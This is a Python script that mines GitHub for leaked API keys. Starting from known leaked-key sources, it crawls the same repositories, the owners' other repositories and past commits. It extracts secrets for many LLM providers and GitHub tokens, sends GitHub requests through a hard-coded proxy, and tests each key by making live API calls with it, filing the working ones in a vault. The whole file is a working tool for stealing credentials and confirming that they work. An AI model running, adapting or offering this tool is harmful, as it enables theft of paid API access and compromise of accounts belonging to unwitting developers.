#!/usr/bin/env python3 """Horizontal pivot miner. From every known LEAKED key source (usable_keys/*/keys.json "source" URLs), pivot laterally to find MORE credentials: Stage 1 Same repo -> pull the whole git tree, fetch high-value files (.env*, config, secrets, yaml, py, js, json, ...) and extract all known LLM key formats. Stage 2 Same owner -> list the owner's other public repos, fetch their root-level dotfiles/config/README, extract keys. Stage 3 Same file -> list commits touching the seed file, fetch each historical blob version, recover deleted keys. All raw blob fetches are keyed by immutable (repo,path,sha) through ContentCache so unchanged files are never re-crawled. """ import argparse, json, os, re, subprocess, sys, time import urllib.request, urllib.error, urllib.parse from concurrent.futures import ThreadPoolExecutor, as_completed from pathlib import Path sys.path.insert(0, str(Path(__file__).resolve().parent)) from content_cache import ContentCache, parse_raw_url HERE = Path(__file__).resolve().parent VAULT = HERE / "usable_keys" RESULTS = HERE / "results" / "pivot" RESULTS.mkdir(parents=True, exist_ok=True) CAND_FILE = RESULTS / "candidates.txt" CHECKPOINT = RESULTS / "candidates.checkpoint.json" GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389") UA = "Mozilla/5.0 key-hunter" _gh = None def gh_opener(): global _gh if _gh is None: if GH_PROXY: h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}) _gh = urllib.request.build_opener(h) else: _gh = urllib.request.build_opener() return _gh _direct = None def direct_opener(): global _direct if _direct is None: _direct = urllib.request.build_opener(urllib.request.ProxyHandler({})) return _direct # --------------------------------------------------------------------------- # GitHub API helpers # --------------------------------------------------------------------------- def github_token(): tok = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN") if tok: return tok try: out = subprocess.run(["gh", "auth", "token"], capture_output=True, text=True, timeout=10) if out.returncode == 0: return out.stdout.strip() except FileNotFoundError: pass hosts = Path.home() / ".config" / "gh" / "hosts.yml" if hosts.exists(): for line in hosts.read_text().splitlines(): line = line.strip() if line.startswith("oauth_token:"): return line.split(":", 1)[1].strip() return None def gh_api(url, token, wants_json=True): headers = {"Accept": "application/vnd.github+json", "User-Agent": "key-hunter"} if token: headers["Authorization"] = f"Bearer {token}" req = urllib.request.Request(url, headers=headers) for attempt in range(6): try: with gh_opener().open(req, timeout=30) as resp: raw = resp.read() return json.loads(raw) if wants_json else raw except urllib.error.HTTPError as e: if e.code in (403, 429): reset = e.headers.get("X-RateLimit-Reset") wait = max(int(reset) - int(time.time()), 5) if reset else 30 print(f" rate-limited, waiting {wait}s...", file=sys.stderr) time.sleep(wait + 1) continue if e.code in (404, 451): return None try: e.read() except Exception: pass return None except Exception as e: print(f" network: {e}", file=sys.stderr) time.sleep(3) return None def fetch_raw(url): req = urllib.request.Request(url, headers={"User-Agent": UA}) try: with gh_opener().open(req, timeout=20) as resp: return resp.read().decode("utf-8", "replace") except Exception: return "" def make_cached_fetch(cc, fetcher=fetch_raw): def cached(url): repo, sha, path = parse_raw_url(url) if repo and sha and path: txt = cc.get(repo, path, sha) if txt is not None: return txt txt = fetcher(url) if txt: cc.put(repo, path, sha, txt) return txt return fetcher(url) return cached # raw.githubusercontent.com refuses a blob SHA as the ref (404); it needs a # branch/commit ref. So fetch by branch ref but key the cache on the immutable # blob SHA we already got from the tree/contents API. def fetch_blob(repo, path, blob_sha, branch, cc): if blob_sha and len(blob_sha) == 40: hit = cc.get(repo.lower(), path, blob_sha) if hit is not None: return hit ref = branch or "HEAD" txt = fetch_raw( f"https://raw.githubusercontent.com/{repo}/{ref}/{path}") if txt and blob_sha and len(blob_sha) == 40: cc.put(repo.lower(), path, blob_sha, txt) return txt # --------------------------------------------------------------------------- # Key format registry. Each pattern -> provider label + (scheme, host, path, # model, auth-header style). We extract ALL formats from every pivoted file. # Order matters: more specific prefixes first so sk-cp-/sk-sp-/sk-cx- are not # swallowed by a generic sk- pattern. # --------------------------------------------------------------------------- PROVIDERS = {} def _reg(name, pattern, base, models=(), auth="Bearer", chat_path="/v1/chat/completions", context=None): PROVIDERS[name] = { "re": re.compile(pattern), "base": base, "models": models, "auth": auth, "chat_path": chat_path, "context": [c.lower() for c in context] if context else None, } # Chinese coding plans / specialist _reg("mimo", r"sk-cx-[A-Za-z0-9]{48}", "https://api.xiaomimimo.com", models=("mimo-v2.5", "mimo-v2"), auth="Bearer") _reg("minimax", r"sk-cp-[A-Za-z0-9_\-]{130,}", "https://api.minimaxi.com", models=("MiniMax-M2.5", "abab6.5s-chat")) _reg("codingplan", r"sk-sp-[0-9a-fA-F]{32}", "https://coding.dashscope.aliyuncs.com", models=("qwen3-coder-plus", "qwen-coder-plus")) _reg("longcat", r"ak_[0-9A-Za-z]{29}", "https://api.longcat.chat", models=("LongCat-2.0-Chat", "LongCat-2.0")) _reg("zyloo", r"sk-zy-[0-9A-Za-z]{20,}", "https://api.zyloo.io", models=("Zyloo-1",)) # Generic LLM keys _reg("deepseek", r"sk-[a-f0-9]{32}", "https://api.deepseek.com", models=("deepseek-chat",)) _reg("dashscope", r"sk-[a-f0-9]{32}", "https://dashscope.aliyuncs.com", models=("qwen-plus",)) _reg("moonshot", r"sk-[A-Za-z0-9]{40,60}", "https://api.moonshot.cn", models=("moonshot-v1-8k",)) _reg("siliconflow",r"sk-[A-Za-z0-9]{48}", "https://api.siliconflow.cn", models=("deepseek-ai/DeepSeek-V3",)) _reg("volcanoark", r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", "https://ark.cn-beijing.volces.com", models=("doubao-seed-1-6-250615",), context=("ark_api_key", "volc_accesskey", "volc_secret", "api_key", "apikey", "authorization", "bearer", "ark.cn-beijing.volces.com/api/v3", "base_url")) _reg("xunfei", r"[0-9a-f]{32}", "https://maas-coding-api.cn-huabei-1.xf-yun.com", models=("xunfei-coding-plan",), context=("xf-yun.com", "xfyun", "xunfei", "iflytek", "spark-api", "maas-coding-api")) _reg("openai", r"sk-[A-Za-z0-9]{48,}", "https://api.openai.com", models=("gpt-4o-mini",)) _reg("anthropic", r"sk-ant-[A-Za-z0-9_\-]{80,}", "https://api.anthropic.com", models=("claude-3-5-haiku-latest",), auth="x-api-key", chat_path="/v1/messages") _reg("groq", r"gsk_[A-Za-z0-9]{52}", "https://api.groq.com", models=("llama-3.1-8b-instant",)) _reg("github_pat", r"gh[pousr]_[A-Za-z0-9]{36,}", "") _reg("openrouter", r"sk-or-v1-[0-9a-f]{64}", "https://openrouter.ai", models=("openai/gpt-4o-mini",)) _reg("together", r"[0-9a-f]{64}", "https://api.together.xyz", models=("meta-llama/Llama-3.1-8B-Instruct-Turbo",), context=("together.xyz", "togetherai", "together_api", "TOGETHER_API_KEY")) # dedup across providers: longest/most-prefixed match wins for a given span PREF_ORDER = ["mimo", "minimax", "codingplan", "longcat", "zyloo", "anthropic", "groq", "github_pat", "openrouter", "siliconflow", "moonshot", "openai", "deepseek", "dashscope", "xunfei", "volcanoark", "together"] BLACKLIST = ("your-", "example", "placeholder", "test", "xxxx", "00000000", "1234567890abcdef", "changeme", "dummy", "fake", "redacted") def looks_real(k): low = k.lower() return not any(b in low for b in BLACKLIST) def extract_all(text): """Return {provider: set(keys)} found in text, longest-prefix-wins. For providers with a 'context' requirement (ambiguous shapes like bare UUIDs/hex), a match is only accepted if text within +/-80 chars around the match contains a provider assignment marker (api key / base url).""" low = (text or "").lower() spans = [] # (start, end, key, provider) for prov in PREF_ORDER: spec = PROVIDERS[prov] markers = spec.get("context") for m in spec["re"].finditer(text or ""): k = m.group(0) if not looks_real(k): continue if markers: lo = max(0, m.start() - 80) hi = min(len(low), m.end() + 80) window = low[lo:hi] if not any(c in window for c in markers): continue spans.append((m.start(), m.end(), k, prov)) # sort by start then longer-first; greedy overlap removal spans.sort(key=lambda s: (s[0], -(s[1] - s[0]))) out = {} occupied = [] for st, en, k, prov in spans: if any(st < e and en > s for s, e in occupied): continue occupied.append((st, en)) out.setdefault(prov, set()).add(k) return out # --------------------------------------------------------------------------- # Verification (direct, no proxy). Only 401 => DEAD. # --------------------------------------------------------------------------- def http_chat(provider, key, timeout=25): p = PROVIDERS[provider] if not p["base"]: return 0, "no-endpoint" url = p["base"].rstrip("/") + p["chat_path"] headers = {"User-Agent": UA, "Content-Type": "application/json"} if p["auth"] == "x-api-key": headers["x-api-key"] = key headers["anthropic-version"] = "2023-06-01" else: headers["Authorization"] = f"Bearer {key}" model = p["models"][0] if p["models"] else "gpt-4o-mini" if provider == "anthropic": body = {"model": model, "max_tokens": 4, "messages": [{"role": "user", "content": "hi"}]} else: body = {"model": model, "max_tokens": 1, "messages": [{"role": "user", "content": "hi"}]} data = json.dumps(body).encode() req = urllib.request.Request(url, data=data, headers=headers, method="POST") try: with direct_opener().open(req, timeout=timeout) as resp: return resp.getcode(), resp.read().decode("utf-8", "replace") except urllib.error.HTTPError as e: try: return e.code, e.read().decode("utf-8", "replace") except Exception: return e.code, "" except Exception as e: return 0, f"network: {type(e).__name__}: {e}" def verify(provider, key): code, body = http_chat(provider, key) bl = (body or "").lower() if code == 200: if '"choices"' in bl or '"content"' in bl or '"id"' in bl: return "USABLE", f"chat 200 OK ({body[:80]})" if any(x in bl for x in ("balance", "quota", "arrear", "insufficient")): return "NO_BALANCE", f"chat: {body[:100]}" return "USABLE", f"chat: {body[:100]}" if code == 401: return "DEAD", "401 unauthorized" if code in (402, 429): return "NO_BALANCE", f"chat HTTP {code}: {body[:100]}" if code == 0: return "UNKNOWN", body[:120] return "NO_ACCESS", f"chat HTTP {code}: {body[:100]}" # --------------------------------------------------------------------------- # Seed collection from vault # --------------------------------------------------------------------------- HTML_RE = re.compile(r"https://github\.com/([^/]+/[^/]+)/blob/([^/]+)/(.*)") def parse_source(url): if not url: return None, None, None, None m = HTML_RE.search(url) if not m: return None, None, None, None repo, sha, path = m.group(1), m.group(2), m.group(3) owner = repo.split("/", 1)[0] return owner, repo, sha, urllib.parse.unquote(path) def collect_seeds(): """Return list of (owner, repo, sha, path, vault_provider) from vault.""" seeds = [] for kf in sorted(VAULT.glob("*/keys.json")): prov = kf.parent.name try: arr = json.loads(kf.read_text()) except Exception: continue if isinstance(arr, dict): arr = [arr] for entry in arr: if not isinstance(entry, dict): continue o, r, s, p = parse_source(entry.get("source", "")) if r: seeds.append((o, r, s, p, prov)) return seeds # --------------------------------------------------------------------------- # Stage 1: same-repo full tree walk -> high-value files # --------------------------------------------------------------------------- HOT_EXT = (".env", ".env.local", ".env.production", ".env.development", ".yaml", ".yml", ".json", ".toml", ".ini", ".conf", ".config", ".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java", ".rb", ".php", ".sh", ".ps1", ".properties", ".txt", ".md", ".example", ".local", ".secret", ".cfg") HOT_NAMES = (".env", "config", "secret", "credential", "apikey", "api_key", "key", "token", "auth", "setting", "constant", "default", "application", "app", "env", "private") SKIP_DIRS = ("node_modules", ".git", "vendor", "dist", "build", "__pycache__", ".next", "target", "venv", ".venv", "site-packages", ".tox") MAX_FILES_PER_REPO = 120 MAX_BYTES = 900_000 def is_hot(path): low = path.lower() base = low.rsplit("/", 1)[-1] if any(sd + "/" in low for sd in SKIP_DIRS): return False if base.startswith(".env") or base.endswith(".env"): return 3 # highest priority if any(h in base for h in ("secret", "credential", "apikey", "api_key", "token", "auth", "private")): return 3 if any(h in base for h in ("config", "setting", "constant", "default", "application", "app", "env")): return 2 if any(low.endswith(e) for e in (".secret", ".cfg", ".ini", ".conf", ".properties", ".local", ".pem", ".key")): return 2 if low.endswith((".yaml", ".yml", ".toml", ".json")): return 1 if low.endswith((".py", ".js", ".ts", ".jsx", ".tsx", ".go", ".java", ".rb", ".php", ".sh", ".ps1")): return 1 return 0 def repo_tree_paths(repo, token): """Use git/trees?recursive=1 on default branch; yield (prio,path,sha,branch).""" data = gh_api(f"https://api.github.com/repos/{repo}", token) if not data: return branch = data.get("default_branch", "main") url = (f"https://api.github.com/repos/{repo}/git/trees/" f"{branch}?recursive=1") tree = gh_api(url, token) if not tree or "tree" not in tree: return for node in tree.get("tree", []): prio = is_hot(node.get("path", "")) if node.get("type") == "blob" and prio: yield prio, node["path"], node.get("sha", ""), branch if tree.get("truncated"): print(f" [warn] {repo} tree truncated, results partial", file=sys.stderr) def stage_repo(repo, token, cc, candidates, seen_files, stats, fetch_workers=12): scored = sorted(repo_tree_paths(repo, token), key=lambda t: -t[0])[:MAX_FILES_PER_REPO] jobs = [] for _prio, path, bsha, branch in scored: key = (repo.lower(), path.lower(), str(bsha).lower()) if key in seen_files: continue seen_files.add(key) jobs.append((path, bsha, branch)) def _fetch(job): path, bsha, branch = job return path, fetch_blob(repo, path, bsha, branch, cc) with ThreadPoolExecutor(max_workers=fetch_workers) as ex: for path, txt in ex.map(_fetch, jobs): if not txt or len(txt) > MAX_BYTES: continue for prov, keys in extract_all(txt).items(): for k in keys: if k not in candidates: candidates[k] = (prov, f"{repo}/{path}") stats["files_with_keys"] += 1 # --------------------------------------------------------------------------- # Stage 2: same-owner other repos # --------------------------------------------------------------------------- def owner_repos(owner, token, max_repos=30): for page in range(1, 3): url = ("https://api.github.com/users/" f"{urllib.parse.quote(owner)}/repos?per_page=100&page={page}" "&sort=updated&type=owner") data = gh_api(url, token) if not data: return for r in data: if r.get("fork"): continue name = r.get("full_name", "") if name and name.lower().split("/", 1)[0] == owner.lower(): yield name if len(data) < 100: return ROOT_HOT = (".env", ".env.local", ".env.production", "config.json", "config.yaml", "config.yml", "config.toml", "settings.json", "appsettings.json", "application.yml", "application.yaml", "secrets.json", ".env.example", "README.md", ".env.sample") def stage_owner(owner, exclude_repo, token, cc, candidates, seen_files, stats): nrepos = 0 for repo in owner_repos(owner, token): if repo.lower() == exclude_repo.lower(): continue nrepos += 1 if nrepos > 30: break meta = gh_api(f"https://api.github.com/repos/{repo}", token) branch = (meta or {}).get("default_branch", "main") url = f"https://api.github.com/repos/{repo}/contents/" items = gh_api(url, token) if not items: continue for it in items: if not isinstance(it, dict): continue p = it.get("path", "") if it.get("type") == "file" and (p.lower() in ROOT_HOT or is_hot(p)): bsha = it.get("sha", "") key = (repo.lower(), p.lower(), str(bsha).lower()) if key in seen_files: continue seen_files.add(key) txt = fetch_blob(repo, p, bsha, branch, cc) if not txt or len(txt) > MAX_BYTES: continue for prov, keys in extract_all(txt).items(): for k in keys: if k not in candidates: candidates[k] = (prov, f"{repo}/HEAD/{p}") stats["files_with_keys"] += 1 # --------------------------------------------------------------------------- # Stage 3: per-seed-file commit history # --------------------------------------------------------------------------- def list_file_commits(repo, path, token, max_commits=6): url = ("https://api.github.com/repos/" + repo + "/commits" f"?path={urllib.parse.quote(path)}&per_page={max_commits}") data = gh_api(url, token) if not data: return [] out = [] for c in data: try: out.append(c["sha"]) except Exception: pass return out def stage_history(owner, repo, sha, path, token, cached_fetch, candidates, seen_files, stats): for csha in list_file_commits(repo, path, token): url = f"https://raw.githubusercontent.com/{repo}/{csha}/{path}" key = (repo.lower(), path.lower(), csha.lower()) if key in seen_files: continue seen_files.add(key) txt = cached_fetch(url) if not txt or len(txt) > MAX_BYTES: continue for prov, keys in extract_all(txt).items(): for k in keys: if k not in candidates: candidates[k] = (prov, f"{repo}@{csha[:8]}/{path}") stats["files_with_keys"] += 1 # --------------------------------------------------------------------------- # Driver # --------------------------------------------------------------------------- def load_existing(): """Keys already known in vault -> set, to skip re-verifying.""" known = set() for kf in VAULT.glob("*/keys.json"): try: arr = json.loads(kf.read_text()) except Exception: continue if isinstance(arr, dict): arr = [arr] for e in arr: if isinstance(e, dict) and e.get("key"): known.add(e["key"]) return known def verify_candidates(candidates, workers, use_cache=True): from verify_cache import CachedVerifier # group by provider by_prov = {} for k, (prov, src) in candidates.items(): if not PROVIDERS[prov]["base"]: continue # no endpoint (github_pat etc) - skip chat verify by_prov.setdefault(prov, []).append((k, src)) verdicts = {v: [] for v in ("USABLE", "NO_BALANCE", "NO_ACCESS", "DEAD", "UNKNOWN")} for prov, items in sorted(by_prov.items()): print(f" [verify] {prov}: {len(items)} candidates") def vfn(k, _prov=prov): return verify(_prov, k) if use_cache: ver = CachedVerifier(f"pivot_{prov}", vfn) ver.__enter__() else: ver = None try: with ThreadPoolExecutor(max_workers=workers) as ex: futs = {ex.submit(ver if ver else vfn, k): (k, src) for k, src in items} for fut in as_completed(futs): k, src = futs[fut] try: v, d = fut.result() except Exception as e: v, d = "UNKNOWN", str(e) verdicts.setdefault(v, []).append((k, src, d)) if v == "USABLE": print(f" [+] USABLE {prov} {k[:18]}... {src}") finally: if ver: ver.__exit__(None, None, None) return verdicts def write_candidates(candidates): with open(CAND_FILE, "w") as f: for k, (prov, src) in sorted(candidates.items(), key=lambda x: (x[1][0], x[0])): f.write(f"{prov}\t{k}\t{src}\n") def write_verdicts(verdicts): summary = {} for v, rows in verdicts.items(): with open(RESULTS / f"{v.lower()}.txt", "w") as f: for k, src, d in rows: f.write(f"{k}\t{src}\t{d}\n") summary[v] = len(rows) with open(RESULTS / "summary.json", "w") as f: json.dump(summary, f, indent=2) print("=== verdicts:", summary) def main(): ap = argparse.ArgumentParser() ap.add_argument("--workers", type=int, default=16) ap.add_argument("--fetch-workers", type=int, default=12) ap.add_argument("--no-owner", action="store_true", help="skip stage 2 (owner repo pivot)") ap.add_argument("--no-history", action="store_true", help="skip stage 3 (commit history)") ap.add_argument("--no-tree", action="store_true", help="skip stage 1 (same-repo tree)") ap.add_argument("--no-content-cache", action="store_true") ap.add_argument("--no-cache", action="store_true", help="skip verdict cache") ap.add_argument("--verify-only", action="store_true") ap.add_argument("--reextract", action="store_true", help="re-extract from cached blobs with tightened " "patterns (no network), then verify") ap.add_argument("--max-repos", type=int, default=0, help="limit seed repos (0=all)") args = ap.parse_args() token = github_token() if not token: print("WARNING: no GitHub token; rate limits will be tight", file=sys.stderr) seeds = collect_seeds() print(f"seeds: {len(seeds)} leaked-key sources") if args.max_repos: seeds = seeds[:args.max_repos] # dedup seed repos / owners seed_repos = sorted({s[1] for s in seeds}) seed_owners = sorted({s[0] for s in seeds}) print(f" {len(seed_repos)} distinct repos, {len(seed_owners)} owners") if args.verify_only: cand = {} for line in CAND_FILE.read_text().splitlines(): parts = line.split("\t") if len(parts) == 3: cand[parts[1]] = (parts[0], parts[2]) print(f"loaded {len(cand)} candidates from {CAND_FILE}") verdicts = verify_candidates(cand, args.workers, use_cache=not args.no_cache) write_verdicts(verdicts) return if args.reextract: print("[reextract] scanning cached blobs with tightened patterns") known = load_existing() cc = ContentCache(force=args.no_content_cache) cc.__enter__() candidates = {} nfiles = 0 for repo, files in cc._data.items(): for path, versions in files.items(): for sha, ent in versions.items(): txt = ent.get("c", "") if isinstance(ent, dict) else "" if not txt: continue nfiles += 1 src = f"{repo}/{path}" for prov, keys in extract_all(txt).items(): for k in keys: if k not in known and k not in candidates: candidates[k] = (prov, src) cc.__exit__(None, None, None) print(f"[reextract] scanned {nfiles} blobs, " f"{len(candidates)} new candidates") write_candidates(candidates) if candidates: verdicts = verify_candidates(candidates, args.workers, use_cache=not args.no_cache) write_verdicts(verdicts) return known = load_existing() print(f"already in vault: {len(known)} keys") def save_checkpoint(): try: tmp = str(CHECKPOINT) + ".tmp" with open(tmp, "w") as f: json.dump({"candidates": {k: list(v) for k, v in candidates.items()}}, f) os.replace(tmp, CHECKPOINT) except Exception as e: print(f" [warn] checkpoint failed: {e}", file=sys.stderr) candidates = {} if CHECKPOINT.exists() and not args.no_cache: try: ch = json.loads(CHECKPOINT.read_text()) for k, v in ch.get("candidates", {}).items(): candidates[k] = tuple(v) print(f"resumed {len(candidates)} candidates from checkpoint") except Exception: pass stats = {"files_with_keys": 0} cc = ContentCache(force=args.no_content_cache) with cc: cf = make_cached_fetch(cc) seen_files = set() # Stage 1: same repo tree if not args.no_tree: print(f"[stage 1] same-repo tree walk ({len(seed_repos)} repos)") for i, repo in enumerate(seed_repos, 1): stage_repo(repo, token, cc, candidates, seen_files, stats, fetch_workers=args.fetch_workers) if i % 5 == 0: save_checkpoint() if i % 10 == 0: print(f" {i}/{len(seed_repos)} repos, " f"{len(candidates)} candidates", flush=True) # Stage 2: owner other repos if not args.no_owner: print(f"[stage 2] owner pivot ({len(seed_owners)} owners)") repo_owner = {s[1]: s[0] for s in seeds} for i, repo in enumerate(seed_repos, 1): owner = repo_owner.get(repo, repo.split("/", 1)[0]) stage_owner(owner, repo, token, cc, candidates, seen_files, stats) time.sleep(1.0) # smooth request burst vs secondary rate limit if i % 5 == 0: save_checkpoint() if i % 10 == 0: print(f" {i}/{len(seed_repos)} owners, " f"{len(candidates)} candidates", flush=True) # Stage 3: commit history per seed file if not args.no_history: print(f"[stage 3] commit history ({len(seeds)} seed files)") for i, (owner, repo, sha, path, prov) in enumerate(seeds, 1): stage_history(owner, repo, sha, path, token, cf, candidates, seen_files, stats) if i % 25 == 0: save_checkpoint() print(f" {i}/{len(seeds)} files, " f"{len(candidates)} candidates", flush=True) save_checkpoint() # strip keys already known new_cand = {k: v for k, v in candidates.items() if k not in known} print(f"[done] {len(candidates)} total extracted, " f"{len(new_cand)} new (not in vault); " f"{stats['files_with_keys']} files yielded keys") write_candidates(new_cand) if new_cand: verdicts = verify_candidates(new_cand, args.workers, use_cache=not args.no_cache) write_verdicts(verdicts) else: print("no new candidates to verify") if __name__ == "__main__": main()